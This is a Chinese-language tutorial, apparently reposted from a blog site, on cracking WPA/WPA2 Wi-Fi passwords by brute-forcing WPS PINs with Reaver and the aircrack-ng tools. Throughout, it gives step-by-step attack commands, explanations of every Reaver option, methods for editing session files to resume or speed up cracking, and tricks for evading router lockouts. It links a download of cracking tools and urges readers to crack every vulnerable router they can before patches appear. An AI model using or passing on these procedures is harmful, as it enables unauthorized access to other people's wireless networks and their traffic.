破解所需資料工具軟件集：http://www.400gb.com/u/156037

Reaver基本命令參數?

XiaoPanOS下：

???選擇“終端”輸入sudo thunar

???這里是為了取得超級權限，選擇系統文件-usr-local-ect-reave

???ifconfig?–a??????????????//確認你用哪一個網卡WLAN0或WLAN1

???airmon-ng start wlan0?????//開啟監聽模式

???wash?–i mon0?–C?????????//查看開啟wps的無線路由器

???airodump-ng mon0??????????//查看周邊AP信息（抓包）

???reaver?–i mon0?–b MAC?–a?–S?–vv?–d 3?–t 3??//開始窮舉PIN碼

???reaver?–i mon0?–b MAC?–a?–S?–vv?–d 0????????//加快速度為1秒

???reaver?–i mon0?–b MAC?–a?–S?–vv?–p xxxx?????//從前4位PIN碼開始

reave的進度表文件保存在:

???1.3版：/etc/reaver/MAC地址.wpc

???1.4版：/usr/local/etc/reaver/MAC地址.wpc

CDliunx下：

???選擇“終端”輸入sudo thunar

???這里是為了取得超級權限，選擇系統文件-usr-local-ect-reaver-

?

reaver必需的參數:

???-i, --interface=wlan Name of the monitor-mode interface to use??//監視模式接口使用的名稱

???-b, --bssid=mac BSSID of the target AP??????????????????//目標AP的SSID

?

reaver可選參數:

???-m, --mac=mac MAC of the host system???????//主機系統的MAC

???-e, --essid=ssid ESSID of the target AP????//目標AP的ESSID

???-c, --channel=channel Set the 802.11 channel for the interface (implies -f)????

????????//設置接口的802.11信道?(意味著?-f)

???-o, --out-file=file Send output to a log file [stdout]?????//輸出發送到一個日志文件

???-s, --session=file Restore a previous session file?????//恢復以前的記錄文件

???-C, --exec=command Execute the supplied command upon successful pin recovery????

????????//所提供的命令執行成功后，pin?恢復

???-D, --daemonize Daemonize reaver?????//守護進程?reaver

???-a, --auto Auto detect the best advanced options for the target AP????

????????//自動檢測目標AP的最先進的選項

???-f, --fixed Disable channel hopping?????//禁用信道跳頻

???-5, --5ghz Use 5GHz 802.11 channels?????//使用5GHz的802.11信道

???-v, --verbose Display non-critical warnings (-vv for more)?????//顯示非關鍵的警告（- VV更多）

???-q, --quiet Only display critical messages?????//僅顯示重要消息

???-h, --help Show help?????//顯示幫助

?

reaver高級選項：

???-p, --pin=wps pin Use the specified 4 or 8 digit WPS pin???????//使用指定的4個或8個的?pin WPS

???-d, --delay=seconds Set the delay between pin attempts [1]?????//設置pin嘗試之間的延遲[1]

???-l, --lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60]????

????????//設置等待的時間，如果AP鎖定WPS PIN嘗試[60]

???-g, --max-attempts=num Quit after num pin attempts?????//退出后NUM pin嘗試

???-x, --fail-wait=seconds Set the time to sleep after 10 unexpected failures [0]????

????????//設定時間后進入休眠10[0]意外故障

???-r, --recurring-delay=xy Sleep for y seconds every x pin attempts?????//對每一個pin碼嘗試Y秒

???-t, --timeout=seconds Set the receive timeout period [5]?????//設置接收超時時間[5]

???-T, --m57-timeout=seconds Set the M5M7 timeout period [0.20]?????//設置M5M7超時期[0.20]

???-A, --no-associate Do not associate with the AP (association must be done by another application)????

????????//不要與AP關聯（協會必須由另一個應用程序進行）

???-N, --no-nacks Do not send NACK messages when out of order packets are received????

????????//不要發送NACK消息收到時，為了包出

???-S, --dh-small Use small DH keys to improve crack speed?????//使用小DH密鑰，以提高PJ速度

???-L, --ignore-locks Ignore locked state reported by the target AP?????//忽略鎖定狀態的目標AP

???-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet????

????????//終止每一個EAP失敗包WPS的記錄

???-n, --nack Target AP always sends a NACK [Auto]?????//目標AP發送一個NACK[自動]

???-w, --win7 Mimic a Windows 7 registrar [False]?????//模仿Windows 7的注冊處處長[虛假]

?

reaver?使用方法和技巧:

reaver使用方法:

???reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -c?頻道

?????-i?監聽后接口名稱

?????-b?目標mac地址

?????-a?自動檢測目標AP最佳配置

?????-S?使用最小的DH key，可以提高PJ速度

?????-vv?顯示更多的非嚴重警告

?????-d?即delay每窮舉一次的閑置時間預設為1秒

?????-c?頻道

?????-p PIN碼四位或八位??//可以用8位直接找到密碼。

???當出現有百分數時你就可以用crtl+c來暫停，它會將reaver的進度表文件保存在

??????1.3版：/etc/reaver/MAC地址.wpc

??????1.4版：/usr/local/etc/reaver/MAC地址.wpc (tmp/minidwep/MAC地址.wpc)

??????用資源管理器，手工將以MAC地址命名的、后輟為wpc的文件拷貝到U盤或硬盤中，

??????下次重啟動后，再手工復制到/etc/reaver/?目錄下即可。

??????注意需要取得ROOT權限,才可將wpc文件復制到/etc/reaver/?目錄下:

??????在終端模擬里面輸入:

????????SUDO SU

????????SUDO THUNAR

?

reaver使用技巧:

??1、將mac地址.wpc?備份后，下次可以繼續使用。

??2、程序默認每嘗試后停止一秒，加入-d0參數使之不停止：

?????reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -d0

??3、-p參數：-p PIN可以讓你在獲取到PIN的情況下直接得到路由WPA密碼！

?????reaver-i mon0 -b MAC -p PIN

??4、wpc結構

?????0??????//這個地方是說它的前4位PIN碼的進度位置數，真實位置要+4

?????0??????//這個地方是說后3位PIN數的已經運行測試位置數

?????0??????//0時沒有找到，當為1時找到前四位，當為2時全部找到。

?????下面是1萬個前四位數（reaver1.3版4位隨機數，1.4版是升序）

?????第4行起

?????0000

?????0001

?????.

?????.

?????9999

?????下面是1千個三位數（PIN第八位數是驗證碼）

?????從1004行起

?????000

?????.

?????.

?????999
????????所以前四位很重要，將已經知道的前四位放在最前面會提高你的PIN速度，我們也可以手動修改wpc文件第一行，如我們要從3000開始pin你可以將它修改為3004,這樣它就會從3000開始PIN了。當我們在PIN時就可以不用保存虛擬機快照了，只要你記住了前四位，你下載用軟件修改WPC文件就可了。???

?????cdlinux對wpc文件最方便，

?????beini和xiaopan對wpc修改要用命令vi來修改，

?????vi的使用方法很簡單viXXXX.wpc打開就可以了，

?????輸入i進行編輯，輸入escap退回命令模式，輸入:wq退出保存。

?

Pin碼重復出現死循環解決之道:

1.xiaopanOS環境解決之道：

當你看到PIN到一定程度，窗口里的PIN碼不變、進度百分比也不走，那么，保持原窗口不變，再點擊ROOTSHELL圖標，新開一個PIN窗口，輸入?“reaver -i mon0 -b?（正在PIN的目標MAC）?-a -s -vv?”(注意：這里“S”要小寫)?那么，你就會發現原來PIN的窗口，PIN碼開始改變，進度開始前進了！而且PIN的時間也大為縮短了！如果是破解到99.99%，執行此部操作就馬上彈出正確的pin碼和wifi密碼，以及路由器的SSID。

2.CDlinux環境解決之道：

當你看到PIN到一定程度，窗口里的PIN碼不變、進度百分比也不走，那么，請Ctrl+C停止，然后點擊[Reaver]按鈕，在彈出的窗口中輸入“-a -s?–vv“?(注意：這里“S”要小寫)?那么，你就會發現原來PIN的窗口，PIN碼開始改變，進度開始前進了！而且PIN的時間也大為縮短了！,如果是破解到99.99%，執行此部操作就馬上彈出正確的pin碼和wifi密碼，以及路由器的SSID。

若到90.9%或99.9%還是不出，也可以試試“reaver -i mon0 -b (正在PIN的目標MAC) -v -a -n [-c]”

時間及經驗總結，基本90.9%和99.9%的死循環，已經100%成功了，最后祝大家破解愉快！

?

用Reaver pin碼破特點：

1、不需要客戶端，

2、有PIN碼就能獲得無線密碼，

3、八位數PIN碼實際只有一萬一千組隨機密碼，

4、抓包、EWSA跑包，每個環節都有很大的不確定性。而PIN破密，只要開戶WPS，破密只是個時間問題。

提醒：大家還是早點都把能pin的路由都破了！可能馬上就有安全補救方案出來了！到時候就沒機會了，時不我待、只爭朝夕！

BT5、CDlinux、beini、xiaopan-OS都支持reaver運行。

reaver使用方法、步驟：

??? 打開超級終端?root shell?

??? 如果電腦裝有多個無線網卡，請先發指令ifconfig -a確認你用哪一個網卡WLAN0或WLAN1

下面的指令都是以單一網卡WLAN0為例

一、激活監聽模式：????airmon-ng start wlan0

二、查看周邊AP信息（抓包）：airodump-ng??mon0

觀察要破AP的PWR信號強弱變化，注意同頻干擾，調整網卡放置位置和角度、方向。

PWR?小于?-75?基本上會Timeout, PWR-60左右,則非常順暢(2-6秒攻擊一次)

三、按Ctrl+C終止抓包

四、抓PIN碼：?reaver -i mon0 -b MAC -vv

例如：reaver -i mon0 -b C8:3A:35:F6:BB:B8 –vv

1.4版可用：reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v（可用一個v）

注意，MAC中冒號不可省略，MAC地址的字母大小寫均可，?-vv是兩個V不是W！

reaver1.3感覺比1.4更穩定些。

特別提示：只有AP開啟了WPS、QSS功能，才可以用PIN法破PSK密碼!

?

如何查看AP是否開了WPS、QSS呢？

一、使用指令: airodump -ng mon0

MB一欄下，出現54e.（看清楚有點“.”）是開WPS的

?

二、WIN7下，用通常的方式連接AP，如果在提示輸入密碼框下面，出現“通過按路由器按鈕也可以連接”，就確認此AP開了WPS、QSS。但是，WIN7下不出現“通過按路由器按鈕也可以連接”，不等于100%沒開WPS。還是?54e.?準。

AP關閉了WPS、或者沒有QSS滴，會出現“WARNING: Failed to associate with XX:XX:XX:XX:XX:XX??(ESSID: XXXX)”

?

??? PIN破密對信號要求極為嚴格，如果信號稍差，可能導致破密進度變慢或者路由死鎖等（重復同一個PIN碼 或?timeout）。
??? 特別是1、6默認頻道中，有較多的AP，相互干擾。因此，確定網卡放置的最佳位置、方向、角度十分重要。

????破解過程中重復同一個PIN碼或timeout可隨時隨地按Ctrl+C終止，reaver會自動保存進度。

若繼續破，則再次在終端中發送: reaver -i mon0 -b MAC -vv，這個命令運行后，會讓你選y或n，選y后就繼續了。

當reaver確定前4位PIN密碼后，其工作完成任務進度數值將直接跳躍至90.9%以上，也就是說只剩余一千個密碼組合了。
總共一萬一千個密碼。

如果，90.9%進程后死機或停機，請記下PIN前四位數，用指令：

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位數)

????會從指定PIN段起破密。

?

如何保存破密進程呢：

reave的進度表文件保存在

1.3版：/etc/reaver/MAC地址.wpc

1.4版：/usr/local/etc/reaver/MAC地址.wpc

用資源管理器，手工將以MAC地址命名的、后輟為wpc的文件拷貝到U盤或硬盤中，下次重啟動后，再手工復制到/etc/reaver/?目錄下即可。CDLINUX下可以粘貼在CDLINUX的桌面上但就是不能粘貼在?usr/local/etc/reaver里面，
解決方法：

新開個窗口輸入?sudo thunar，這樣打開的文件管理器，具有root權限，可以拷貝文件到任何目錄了！

timeout時，可適當調整網卡方位，在同一PIN數值反復測試。也可Ctrl+C終止破密，讓路由器休息幾十秒，也是不錯的選擇，否則個別型號AP會自鎖PIN連接功能。

另外，也可以給命令增加2個參數，延長PIN窮舉和反饋的響應時間避免路由當機。

reaver -i mon0 -b MAC -a -S -vv -d 3 -t 3

????-d?即delay每窮舉一次的閑置時間預設為1秒

????-t?即timeout每次窮舉等待反饋的最長時間

總結

以上是生活随笔為你收集整理的wpa/wpa2无线网pin码破解的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。